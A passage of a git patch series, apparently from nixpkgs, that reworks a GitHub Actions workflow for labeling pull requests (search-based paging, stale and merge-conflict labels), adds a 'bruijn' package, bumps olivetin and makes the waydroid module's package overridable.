logic we fetch the pull_request data again below, even if // we are already in a pull_request event's context and would have the data readily // available. We do this by filtering the list of pull requests with head and base @@ -165,7 +141,7 @@ jobs: base: context.payload.pull_request.base.ref } - async function handle(pull_request, done) { + async function handle(pull_request, done, cutoff) { try { const log = (k,v,skip) => { core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) @@ -292,6 +268,30 @@ jobs: } } + const cutoff = new Date(await (async () => { + // Always run for Pull Request triggers, no cutoff since there will be a single + // response only anyway. 0 is the Unix epoch, so always smaller. + if (context.payload.pull_request?.number) return 0 + + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. 
+ const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) + const prs = await github.paginate( github.rest.pulls.list, { @@ -301,7 +301,7 @@ jobs: direction: 'desc', ...prEventCondition }, - (response, done) => response.data.map(pull_request => handle(pull_request, done)) + (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) ); (await Promise.allSettled(prs.flat())) From 8b5101554abc12b9fdf6be4095f11b1d0b1e2892 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 16:18:19 +0200 Subject: [PATCH 43/73] workflows/labels: save an API request when running in pull_request context We previously ran another list request in this case, but don't need to anymore - we already have the `pull_request` context available. --- .github/workflows/labels.yml | 86 ++++++++++++++++-------------------- 1 file changed, 37 insertions(+), 49 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 0cace4e0217b..7bf96fe5856d 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -131,16 +131,6 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - // To simplify this action's logic we fetch the pull_request data again below, even if - // we are already in a pull_request event's context and would have the data readily - // available. We do this by filtering the list of pull requests with head and base - // branch - there can only be a single open Pull Request for any such combination. - const prEventCondition = !context.payload.pull_request ? undefined : { - // "label" is in the format of `user:branch` or `org:branch` - head: context.payload.pull_request.head.label, - base: context.payload.pull_request.base.ref - } - async function handle(pull_request, done, cutoff) { try { const log = (k,v,skip) => { @@ -157,8 +147,7 @@ jobs: ...context.repo, workflow_id: 'pr.yml', event: 'pull_request_target', - // For PR events, the workflow run is still in progress with this job itself. - status: prEventCondition ? 'in_progress' : 'success', + status: 'success', exclude_pull_requests: true, head_sha: pull_request.head.sha })).data.workflow_runs[0]?.id ?? @@ -268,47 +257,46 @@ jobs: } } - const cutoff = new Date(await (async () => { - // Always run for Pull Request triggers, no cutoff since there will be a single - // response only anyway. 0 is the Unix epoch, so always smaller. - if (context.payload.pull_request?.number) return 0 + if (context.payload.pull_request) { + await handle(context.payload.pull_request) + } else { + const cutoff = new Date(await (async () => { + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. 
+ const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) - core.info('cutoff timestamp: ' + cutoff.toISOString()) + const prs = await github.paginate( + github.rest.pulls.list, + { + ...context.repo, + state: 'open', + sort: 'updated', + direction: 'desc', + }, + (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) + ); - const prs = await github.paginate( - github.rest.pulls.list, - { - ...context.repo, - state: 'open', - sort: 'updated', - direction: 'desc', - ...prEventCondition - }, - (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) - ); + (await Promise.allSettled(prs.flat())) + .filter(({ status }) => status == 'rejected') + .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - (await Promise.allSettled(prs.flat())) - .filter(({ status }) => status == 'rejected') - .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - - core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) + core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) + } clearInterval(reservoirUpdater) - name: Log current API rate limits From 248f4b8deb76ab68a8351868465ac31fc2898d6b Mon Sep 17 00:00:00 2001 From: Defelo Date: Sat, 21 Jun 2025 16:57:58 +0200 Subject: [PATCH 44/73] bruijn: init at 0-unstable-2025-06-23 --- pkgs/by-name/br/bruijn/generated.nix | 75 ++++++++++++++++++++++++++++ pkgs/by-name/br/bruijn/package.nix | 25 ++++++++++ pkgs/by-name/br/bruijn/update.sh | 16 ++++++ pkgs/by-name/br/bruijn/version.txt | 1 + 4 files changed, 117 insertions(+) create mode 100644 pkgs/by-name/br/bruijn/generated.nix create mode 100644 pkgs/by-name/br/bruijn/package.nix create mode 100755 pkgs/by-name/br/bruijn/update.sh create mode 100644 pkgs/by-name/br/bruijn/version.txt diff --git a/pkgs/by-name/br/bruijn/generated.nix 
b/pkgs/by-name/br/bruijn/generated.nix new file mode 100644 index 000000000000..cd95e0dca2a7 --- /dev/null +++ b/pkgs/by-name/br/bruijn/generated.nix @@ -0,0 +1,75 @@ +{ + mkDerivation, + array, + base, + binary, + bitstring, + bytestring, + clock, + containers, + deepseq, + directory, + fetchzip, + filepath, + haskeline, + lib, + megaparsec, + mtl, + optparse-applicative, + process, + random, + time, +}: +mkDerivation { + pname = "bruijn"; + version = "0.1.0.0"; + src = fetchzip { + url = "https://github.com/marvinborner/bruijn/archive/d60ad52f135370635db3a2db3363005670af14b8.tar.gz"; + sha256 = "182v56vc71467q8x7bp83ch6wp3kv5wgxrm53l2vvnvfqyqswpi2"; + }; + isLibrary = true; + isExecutable = true; + enableSeparateDataOutput = true; + libraryHaskellDepends = [ + array + base + binary + bitstring + bytestring + clock + containers + deepseq + directory + filepath + haskeline + megaparsec + mtl + optparse-applicative + process + random + time + ]; + executableHaskellDepends = [ + array + base + binary + bitstring + bytestring + clock + containers + deepseq + directory + filepath + haskeline + megaparsec + mtl + optparse-applicative + process + random + time + ]; + homepage = "https://github.com/githubuser/bruijn#readme"; + license = lib.licenses.mit; + mainProgram = "bruijn"; + maintainers = [ lib.maintainers.defelo ]; +} diff --git a/pkgs/by-name/br/bruijn/package.nix b/pkgs/by-name/br/bruijn/package.nix new file mode 100644 index 000000000000..981b57465a8e --- /dev/null +++ b/pkgs/by-name/br/bruijn/package.nix @@ -0,0 +1,25 @@ +{ + haskell, + haskellPackages, + lib, +}: + +let + inherit (haskell.lib.compose) justStaticExecutables overrideCabal; + + generated = haskellPackages.callPackage ./generated.nix { }; + + overrides = { + version = lib.fileContents ./version.txt; + + passthru.updateScript = ./update.sh; + + description = "Purely functional programming language based on lambda calculus and de Bruijn indices"; + homepage = "https://bruijn.marvinborner.de/"; + }; +in + +lib.pipe generated [ + (overrideCabal overrides) + justStaticExecutables +] diff --git a/pkgs/by-name/br/bruijn/update.sh b/pkgs/by-name/br/bruijn/update.sh new file mode 100755 index 000000000000..40454a4d226c --- /dev/null +++ b/pkgs/by-name/br/bruijn/update.sh @@ -0,0 +1,16 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i bash -p coreutils cabal2nix curl jq nixfmt-rfc-style + +set -euo pipefail + +cd "$(dirname "${BASH_SOURCE[0]}")" + +{ read -r rev; read -r committer_date; } \ + < <(curl ${GITHUB_TOKEN:+-u ":$GITHUB_TOKEN"} -sfL https://api.github.com/repos/marvinborner/bruijn/branches/main \ + | jq -r '.commit | .sha, .commit.committer.date') + +cabal2nix --maintainer defelo "https://github.com/marvinborner/bruijn/archive/${rev}.tar.gz" \ + | nixfmt \ + > generated.nix + +echo "0-unstable-$(date -I --date="$committer_date")" > version.txt diff --git a/pkgs/by-name/br/bruijn/version.txt b/pkgs/by-name/br/bruijn/version.txt new file mode 100644 index 000000000000..8bac9139bd76 --- /dev/null +++ b/pkgs/by-name/br/bruijn/version.txt @@ -0,0 +1 @@ +0-unstable-2025-06-23 From 9438cfd2d67afd836b6c43e29fc4f63dcf05eb06 Mon Sep 17 00:00:00 2001 From: Defelo Date: Sun, 22 Jun 2025 22:38:28 +0000 Subject: [PATCH 45/73] olivetin: 2025.6.6 -> 2025.6.22 Changelog: https://github.com/OliveTin/OliveTin/releases/tag/2025.6.22 Diff: https://github.com/OliveTin/OliveTin/compare/2025.6.6...2025.6.22 --- pkgs/by-name/ol/olivetin/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git 
a/pkgs/by-name/ol/olivetin/package.nix b/pkgs/by-name/ol/olivetin/package.nix index 099f91830fc5..21eb3657b331 100644 --- a/pkgs/by-name/ol/olivetin/package.nix +++ b/pkgs/by-name/ol/olivetin/package.nix @@ -49,7 +49,7 @@ buildGoModule ( ''; outputHashMode = "recursive"; - outputHash = "sha256-KygZ7NqkfhczYy1YMR824Om4NTq06+KHa/jvmsCty3s="; + outputHash = "sha256-3CtcjqjPmK//f15aTE4bUA+moaXNz+AeWiopqWf9qq8="; }; webui = buildNpmPackage { @@ -81,13 +81,13 @@ { pname = "olivetin"; - version = "2025.6.6"; + version = "2025.6.22"; src = fetchFromGitHub { owner = "OliveTin"; repo = "OliveTin"; tag = finalAttrs.version; - hash = "sha256-yzAuhrkJEBErf9yYuRoq5B7PT0XA0w668AG5LNSSRFM="; + hash = "sha256-fNE8x0d0lnKVxy4fk3h5QrcWnMKBcxhrxpDbZYTXimc="; }; modRoot = "service"; From d9d97fda59d81255aa606f1fccf04dc9f2b6240c Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 12:21:20 +0200 Subject: [PATCH 46/73] workflows/labels: refactor to search instead of listing PRs This doesn't provide much value by itself yet, but it is much more flexible for the next step, which will also look at much older PRs. --- .github/workflows/labels.yml | 59 +++++++++++++++++++++++------------- 1 file changed, 38 insertions(+), 21 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 7bf96fe5856d..6d727e34d5c6 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -101,6 +101,9 @@ jobs: github.hook.wrap('request', async (request, options) => { // Requests to the /rate_limit endpoint do not count against the rate limit. if (options.url == '/rate_limit') return request(options) + // Search requests are in a different resource group, which allows 30 requests / minute. + // We do less than a handful each run, so not implementing throttling for now. + if (options.url.startsWith('/search/')) return request(options) stats.requests++ if (['POST', 'PUT', 'PATCH', 'DELETE'].includes(options.method)) return writeLimits.schedule(request.bind(null, options)) @@ -131,17 +134,28 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - async function handle(pull_request, done, cutoff) { + async function handle(item) { try { const log = (k,v,skip) => { - core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) + core.info(`#${item.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) return skip } - if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) - return done() + log('Last updated at', item.updated_at) stats.prs++ - log('URL', pull_request.html_url) + log('URL', item.html_url) + + const pull_number = item.number + const issue_number = item.number + + // The search result is of a format that works for both issues and pull requests and thus + // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, + // which we need to fetch the workflow run below. When triggered via pull_request event, + // this field is already available. + const pull_request = item.head ? 
item : (await github.rest.pulls.get({ + ...context.repo, + pull_number + })).data const run_id = (await github.rest.actions.listWorkflowRuns({ ...context.repo, @@ -188,7 +202,7 @@ jobs: repositoryOwner: context.repo.owner, token: core.getInput('github-token') }, - path: path.resolve(pull_request.number.toString()), + path: path.resolve(pull_number.toString()), expectedHash: artifact.digest }) @@ -197,7 +211,7 @@ const before = Object.fromEntries( (await github.paginate(github.rest.issues.listLabelsOnIssue, { ...context.repo, - issue_number: pull_request.number + issue_number })) .map(({ name }) => [name, true]) ) @@ -205,17 +219,17 @@ const approvals = new Set( (await github.paginate(github.rest.pulls.listReviews, { ...context.repo, - pull_number: pull_request.number + pull_number })) .filter(review => review.state == 'APPROVED') .map(review => review.user?.id) ) const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) + JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) ).map(m => Number.parseInt(m, 10))) - const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels + const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels // Manage the labels const after = Object.assign( @@ -249,11 +263,11 @@ await github.rest.issues.setLabels({ ...context.repo, - issue_number: pull_request.number, + issue_number, labels }) } catch (cause) { - throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) + throw new Error(`Labeling #${item.number} failed.`, { cause }) } } @@ -280,18 +294,21 @@ })()) core.info('cutoff timestamp: ' + cutoff.toISOString()) - const prs = await github.paginate( - github.rest.pulls.list, + const items = await github.paginate( + github.rest.search.issuesAndPullRequests, { - ...context.repo, - state: 'open', - sort: 'updated', - direction: 'desc', - }, - (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) + q: [ + `repo:"${process.env.GITHUB_REPOSITORY}"`, + 'type:pr', + 'is:open', + `updated:>=${cutoff.toISOString()}` + ].join(' AND '), + // TODO: Remove in 2025-10, when it becomes the default. + advanced_search: true + } ); - (await Promise.allSettled(prs.flat())) + (await Promise.allSettled(items.map(handle))) .filter(({ status }) => status == 'rejected') .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) From e55128a079e998204d0e0721cc750ee354d0ea8e Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 19:47:22 +0200 Subject: [PATCH 47/73] workflows/labels: run on every PR eventually This replaces the manual dispatch trigger with a batched run through all pull requests every day. This has the small benefit of not having to worry about backfilling labels after fixing bugs - and the much bigger one of being able to handle merge-conflict and stale labels properly later. For those, it's inevitable to eventually scan through all PRs. At this stage, the vast majority of PRs will still be skipped, because there won't be an eval run with an artifact available. This will be improved in the next step. Technically, the workflow_dispatch trigger is kept to allow easy testing of this in forks, where the scheduled jobs are disabled. The triggered job will behave similarly to the scheduled job, though, and have no special inputs.
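A rough sketch of the paging arithmetic this introduces (illustrative only: `pageForRun` is a made-up helper, and the ~7000-PR and 100-per-page figures are taken from the code comments in the diff below):

    // Consecutive scheduled runs walk all search result pages and wrap
    // around, so every open PR is eventually visited.
    const pageForRun = (totalRuns, totalPulls, perPage = 100) =>
      totalRuns % Math.ceil(totalPulls / perPage)
    console.log(pageForRun(0, 7000))  // page 0
    console.log(pageForRun(69, 7000)) // page 69, the last of 70 pages
    console.log(pageForRun(70, 7000)) // page 0 again, so the cycle restarts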
--- .github/workflows/labels.yml | 85 ++++++++++++++++++++++-------------- 1 file changed, 52 insertions(+), 33 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 6d727e34d5c6..95385b482af8 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -17,18 +17,12 @@ on: NIXPKGS_CI_APP_PRIVATE_KEY: required: true workflow_dispatch: - inputs: - updatedWithin: - description: 'Updated within [hours]' - type: number - required: false - default: 0 # everything since last run concurrency: # This explicitly avoids using `run_id` for the concurrency key to make sure that only - # *one* non-PR run can run at a time. + # *one* scheduled run can run at a time. group: labels-${{ github.workflow }}-${{ github.event_name }}-${{ github.event.pull_request.number }} - # PR- and manually-triggered runs will be cancelled, but scheduled runs will be queued. + # PR-triggered runs will be cancelled, but scheduled runs will be queued. cancel-in-progress: ${{ github.event_name != 'schedule' }} # This is used as fallback without app only. @@ -69,8 +63,6 @@ jobs: - name: Labels from API data and Eval results uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 - env: - UPDATED_WITHIN: ${{ inputs.updatedWithin }} with: github-token: ${{ steps.app-token.outputs.token || github.token }} script: | @@ -131,9 +123,6 @@ jobs: const reservoirUpdater = setInterval(updateReservoir, 60 * 1000) process.on('uncaughtException', () => clearInterval(reservoirUpdater)) - if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) - throw new Error('Please enter "updated within" as integer in hours.') - async function handle(item) { try { const log = (k,v,skip) => { @@ -274,27 +263,22 @@ jobs: if (context.payload.pull_request) { await handle(context.payload.pull_request) } else { - const cutoff = new Date(await (async () => { - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + const workflowData = (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true, + per_page: 1 + })).data - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) + // Go back as far as the last successful run of this workflow to make sure + // we are not leaving anyone behind on GHA failures. + // Defaults to go back 1 hour on the first run. + const cutoff = new Date(workflowData.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000) core.info('cutoff timestamp: ' + cutoff.toISOString()) - const items = await github.paginate( + const updatedItems = await github.paginate( github.rest.search.issuesAndPullRequests, { q: [ @@ -306,9 +290,44 @@ jobs: // TODO: Remove in 2025-10, when it becomes the default. 
advanced_search: true } - ); + ) - (await Promise.allSettled(items.map(handle))) + const allOptions = { + q: [ + `repo:"${process.env.GITHUB_REPOSITORY}"`, + 'type:pr', + 'is:open' + ].join(' AND '), + sort: 'created', + direction: 'asc', + // TODO: Remove in 2025-10, when it becomes the default. + advanced_search: true + } + + const { total_count: total_pulls } = (await github.rest.search.issuesAndPullRequests({ + ...allOptions, + per_page: 1 + })).data + const { total_count: total_runs } = workflowData + const allItems = (await github.rest.search.issuesAndPullRequests({ + ...allOptions, + per_page: 100, + // We iterate through pages of 100 items across scheduled runs. With currently ~7000 open PRs and + // up to 6*24=144 scheduled runs per day, we hit every PR twice each day. + // We might not hit every PR on one iteration, because the pages will shift slightly when + // PRs are closed or merged. We assume this to be OK on the bigger scale, because a PR which was + // missed once, would have to move through the whole page to be missed again. This is very unlikely, + // so it should certainly be hit on the next iteration. + // TODO: Evaluate after a while, whether the above holds still true and potentially implement + // an overlap between runs. + page: total_runs % Math.ceil(total_pulls / 100) + })).data.items + + // Some items might be in both search results, so filtering out duplicates as well. + const items = [].concat(updatedItems, allItems) + .filter((thisItem, idx, arr) => idx == arr.findIndex(firstItem => firstItem.number == thisItem.number)) + + ;(await Promise.allSettled(items.map(handle))) .filter(({ status }) => status == 'rejected') .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) From 63b9355ed892b715a881f95e71fc3c22c67bb641 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:18:25 +0200 Subject: [PATCH 48/73] workflows/labels: handle missing eval results gracefully We keep working through the PR, even though we don't have any eval results. This will allow actually managing labels for much older PRs as well. Most importantly, it will allow merge-conflict and stale-labeling next. --- .github/workflows/labels.yml | 76 ++++++++++++++++++++---------------- 1 file changed, 43 insertions(+), 33 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 95385b482af8..dc1c9344717f 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -165,12 +165,12 @@ jobs: head_sha: pull_request.head.sha })).data.workflow_runs[0]?.id - // Newer PRs might not have run Eval to completion, yet. We can skip them, because this - // job will be run as part of that Eval run anyway. - if (log('Last eval run', run_id ?? '', !run_id)) - return; + // Newer PRs might not have run Eval to completion, yet. + // Older PRs might not have an eval.yml workflow, yet. + // In either case we continue without fetching an artifact on a best-effort basis. + log('Last eval run', run_id ?? '') - const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + const artifact = run_id && (await github.rest.actions.listWorkflowRunArtifacts({ ...context.repo, run_id, name: 'comparison' @@ -179,21 +179,22 @@ jobs: // Instead of checking the boolean artifact.expired, we will give us a minute to // actually download the artifact in the next step and avoid that race condition. 
// Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will be skipped as well. - const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) - return; - stats.artifacts++ + // called "comparison", yet, will skip the download. + const expired = !artifact || new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + log('Artifact expires at', artifact?.expires_at ?? '') + if (!expired) { + stats.artifacts++ - await artifactClient.downloadArtifact(artifact.id, { - findBy: { - repositoryName: context.repo.repo, - repositoryOwner: context.repo.owner, - token: core.getInput('github-token') - }, - path: path.resolve(pull_number.toString()), - expectedHash: artifact.digest - }) + await artifactClient.downloadArtifact(artifact.id, { + findBy: { + repositoryName: context.repo.repo, + repositoryOwner: context.repo.owner, + token: core.getInput('github-token') + }, + path: path.resolve(pull_number.toString()), + expectedHash: artifact.digest + }) + } // Create a map (Label -> Boolean) of all currently set labels. // Each label is set to True and can be disabled later. @@ -214,32 +215,41 @@ jobs: .map(review => review.user?.id) ) - const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) - ).map(m => Number.parseInt(m, 10))) - - const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels - - // Manage the labels + // Manage most of the labels, without eval results const after = Object.assign( {}, before, - // Ignore `evalLabels` if it's an array. - // This can happen for older eval runs, before we switched to objects. - // The old eval labels would have been set by the eval run, - // so now they'll be present in `before`. - // TODO: Simplify once old eval results have expired (~2025-10) - (Array.isArray(evalLabels) ? undefined : evalLabels), { '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, '12.approvals: 3+': approvals.size >= 3, - '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), '12.first-time contribution': [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), } ) + // Manage labels based on eval results + if (!expired) { + const maintainers = new Set(Object.keys( + JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) + ).map(m => Number.parseInt(m, 10))) + + const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels + + Object.assign( + after, + // Ignore `evalLabels` if it's an array. + // This can happen for older eval runs, before we switched to objects. + // The old eval labels would have been set by the eval run, + // so now they'll be present in `before`. + // TODO: Simplify once old eval results have expired (~2025-10) + (Array.isArray(evalLabels) ? undefined : evalLabels), + { + '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + } + ) + } + // No need for an API request, if all labels are the same. const hasChanges = Object.keys(after).some(name => (before[name] ?? 
false) != after[name]) if (log('Has changes', hasChanges, !hasChanges)) From 58dd9630c38123707c6acd97fb65f33f36c70af1 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:33:12 +0200 Subject: [PATCH 49/73] workflows/labels: manage stale label for pull requests This manages the `2. status: stale` label for pull requests only (not issues, yet) with the following conditions: - The last event on the timeline of the Pull Request counts. - Labeling and unlabeling of any kind are ignored. - PRs older than 180 days are stale. - Security-labeled PRs are never stale. To handle this label correctly, it's important to go through all pull requests. Any approach to limiting the list of PRs via search is not going to work: - Filtering by `updated` is not going to work, because it includes the last time that *a label was set* on the PR. To actually find out whether a PR is stale or not, the timeline of events needs to be looked at. - Filtering by an existing stale label is not going to work either, because such a label might have been added manually, which would break the rules we set up here. Thus any existing label needs to be confirmed as well. --- .github/workflows/labels.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index dc1c9344717f..99a5dcf7004d 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -215,11 +215,28 @@ jobs: .map(review => review.user?.id) ) + const latest_event_at = new Date( + (await github.paginate( + github.rest.issues.listEventsForTimeline, + { + ...context.repo, + issue_number, + per_page: 100 + } + )) + // We also ignore base_ref_force_pushed, which will not happen in nixpkgs, but + // is very useful for testing in forks. + .findLast(({ event }) => !['labeled', 'unlabeled', 'base_ref_force_pushed'].includes(event)) + ?.created_at ?? item.created_at + ) + const stale_at = new Date(new Date().setDate(new Date().getDate() - 180)) + // Manage most of the labels, without eval results const after = Object.assign( {}, before, { + '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, '12.approvals: 3+': approvals.size >= 3, From 36e9fe9e7d8537438cf5d8f3cf197921f171d154 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:53:41 +0200 Subject: [PATCH 50/73] workflows/labels: manage merge-conflict label for pull requests The code comments describe what we do much better than a commit message ever could. --- .github/workflows/labels.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 99a5dcf7004d..c3bc9301f67f 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -141,6 +141,8 @@ jobs: // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, // which we need to fetch the workflow run below. When triggered via pull_request event, // this field is already available. + // This API request is also important for the merge-conflict label, because it triggers the + // creation of a new test merge commit. This is needed to actually determine the state of a PR. const pull_request = item.head ? 
+ // Those have an intermediate state while the test merge commit is created. + // This doesn't work well for us, because we might have just triggered another + // test merge commit creation by request the pull request via API at the start + // of this function. + // The attribute merge_commit_sha keeps the old value of null or the hash *until* + // the new test merge commit has either successfully been created or failed so. + // This essentially means we are updating the merge conflict label in two steps: + // On the first pass of the day, we just fetch the pull request, which triggers + // the creation. At this stage, the label is likely not updated, yet. + // The second pass will then read the result from the first pass and set the label. + '2.status: merge conflict': !pull_request.merge_commit_sha, '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, From ee0937ff0db78d87f57165c89038c0f1dfd22fa4 Mon Sep 17 00:00:00 2001 From: wxt <3264117476@qq.com> Date: Sun, 22 Jun 2025 08:02:37 +0800 Subject: [PATCH 51/73] nixos/waydroid: allow override waydroid --- nixos/modules/virtualisation/waydroid.nix | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/nixos/modules/virtualisation/waydroid.nix b/nixos/modules/virtualisation/waydroid.nix index f9891023291c..a26bddc393ae 100644 --- a/nixos/modules/virtualisation/waydroid.nix +++ b/nixos/modules/virtualisation/waydroid.nix @@ -8,7 +8,6 @@ let cfg = config.virtualisation.waydroid; kCfg = config.lib.kernelConfig; - kernelPackages = config.boot.kernelPackages; waydroidGbinderConf = pkgs.writeText "waydroid.conf" '' [Protocol] /dev/binder = aidl2 @@ -26,6 +25,7 @@ in options.virtualisation.waydroid = { enable = lib.mkEnableOption "Waydroid"; + package = lib.mkPackageOption pkgs "waydroid" { }; }; config = lib.mkIf cfg.enable { @@ -49,7 +49,7 @@ in environment.etc."gbinder.d/waydroid.conf".source = waydroidGbinderConf; - environment.systemPackages = with pkgs; [ waydroid ]; + environment.systemPackages = [ cfg.package ]; networking.firewall.trustedInterfaces = [ "waydroid0" ]; @@ -63,7 +63,7 @@ in serviceConfig = { Type = "dbus"; UMask = "0022"; - ExecStart = "${pkgs.waydroid}/bin/waydroid -w container start"; + ExecStart = "${cfg.package}/bin/waydroid -w container start"; BusName = "id.waydro.Container"; }; }; 